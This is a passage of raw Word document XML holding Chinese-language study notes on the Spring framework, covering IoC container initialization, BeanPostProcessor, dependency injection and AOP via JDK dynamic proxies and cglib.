          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器初始化：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ReSource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定位过程；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>载入；向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器注册这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BeanDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D1950" w:rsidRPr="001945EB" w:rsidRDefault="000D1950" w:rsidP="00E71278">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BeanPostProcessor</w:t>
      </w:r>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>是后置处理器，它是一个监听器，可以监听容器触发的事件。将它向</w:t>
      </w:r>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>容器注册后，容器中管理的</w:t>
      </w:r>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>具备了接收</w:t>
      </w:r>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:r w:rsidRPr="001945EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>容器事件回调的能力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050027F" w:rsidRDefault="00DA54D7" w:rsidP="00E71278">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId228" w:history="1">
        <w:r w:rsidR="000E477A" w:rsidRPr="00AF3026">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/turkeyzhou/article/category/365505/2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="00E71278">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">6.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00355C8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的管理容器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,IOC,DI,AOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。三个核心组件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的关系，给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供一个运行时的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ioc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是发现、建立和维护每个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间关系的工具。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>控制权由对象本身转向容器；由容器根据配置文件去创建实例并创建各个实例之间的依赖关系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="003B13F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>来负责控制对象的生命周期和对象间的关系</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。所有的类都会在</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>容器中登记，告诉</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>你是什么</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>你需要什么，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>会在系统运行到适当的时候，把你要的东西主动给你</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>同时也把你交给其他需要你的东西。所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="003B13F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>类的创建、销毁都由</w:t>
      </w:r>
      <w:r w:rsidRPr="003B13F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> spring</w:t>
      </w:r>
      <w:r w:rsidRPr="003B13F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>来控制</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，也就是说控制对象生存周期的不再是引用它的对象，而是</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="009A6B50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> IoC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的一个重点是在系统运行中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>动态的向某个对象提供它所需要的其他对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。这一点是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DI</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，依赖注入）来实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="009449A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。对象之间的依赖关系通过配置文件来管理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="0052553A" w:rsidRDefault="000E477A" w:rsidP="00A42A11">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就是面向切面编程。它主要运</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53DB0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53DB0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53DB0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>动态代理中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53DB0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53DB0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类和</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53DB0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53DB0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口实现</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。举例简单来说假如想要在原来的目标类的前后要加入日志的功能，目标类一定要实现一个接口，如果没有实现接口，</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就会用</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cglib</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>包实现</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。推荐的还是要实现一个接口。实现过程大概就是实现了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Inv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cationHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口的方法，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
